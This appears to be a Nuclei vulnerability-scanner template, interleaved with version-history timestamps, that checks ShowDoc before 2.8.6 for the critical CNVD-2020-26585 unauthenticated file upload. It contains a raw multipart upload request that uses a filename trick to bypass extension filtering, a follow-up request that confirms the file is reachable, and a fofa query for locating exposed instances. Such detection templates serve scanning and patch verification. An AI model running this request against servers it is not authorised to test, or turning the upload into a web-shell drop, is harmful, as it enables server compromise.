2023-03-24 17:35:29 +00:00
id : CNVD-2020-26585
info :
2023-03-31 10:19:43 +00:00
name : Showdoc <2.8.6 - File Uploads
author : pikpikcu,Co5mos
2023-03-24 17:35:29 +00:00
severity : critical
2023-03-31 10:19:43 +00:00
description : |
ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.
2023-03-24 17:35:29 +00:00
reference :
- https://vul.wangan.com/a/CNVD-2020-26585
- https://blog.csdn.net/qq_48985780/article/details/122211136
2023-03-31 10:19:43 +00:00
- https://github.com/star7th/showdoc/pull/1059
2023-03-24 17:35:29 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score : 9.9
cwe-id : CWE-434
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-03-24 17:35:29 +00:00
verified : true
fofa-query : app="ShowDoc"
2023-03-31 10:19:43 +00:00
tags : cnvd,cnvd2020,showdoc,fileupload
2023-03-24 17:35:29 +00:00
2023-07-28 14:55:49 +00:00
variables :
str1 : "{{randstr}}"
2023-04-27 04:28:59 +00:00
http :
2023-03-24 17:35:29 +00:00
- raw :
- |
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host : {{Hostname}}
2023-03-31 10:19:43 +00:00
Content-Type : multipart/form-data; boundary=--------------------------835846770881083140190633
2023-03-25 18:02:20 +00:00
2023-03-31 10:19:43 +00:00
----------------------------835846770881083140190633
Content-Disposition : form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt"
2023-03-24 17:35:29 +00:00
Content-Type : text/plain
2023-07-28 14:55:49 +00:00
{{str1}}
2023-03-31 10:19:43 +00:00
----------------------------835846770881083140190633 --
2023-03-24 17:35:29 +00:00
- |
GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1
Host : {{Hostname}}
2023-03-25 18:02:20 +00:00
2023-03-31 10:19:43 +00:00
matchers :
2023-07-28 14:55:49 +00:00
- type : dsl
dsl :
- status_code_2 == 200
- body_2 == str1
condition : and
2023-03-31 10:19:43 +00:00
2023-03-24 17:35:29 +00:00
extractors :
- type : regex
name : date
part : body
group : 1
regex :
2023-03-31 10:19:43 +00:00
- '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
internal : true
2023-03-24 17:35:29 +00:00
- type : regex
name : file
part : body
group : 2
regex :
2023-03-31 10:19:43 +00:00
- '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
2023-07-06 05:54:47 +00:00
internal : true